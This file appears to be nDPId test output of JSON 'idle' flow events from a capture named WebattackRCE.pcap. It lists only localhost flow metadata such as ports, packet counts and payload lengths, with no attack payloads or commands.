00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
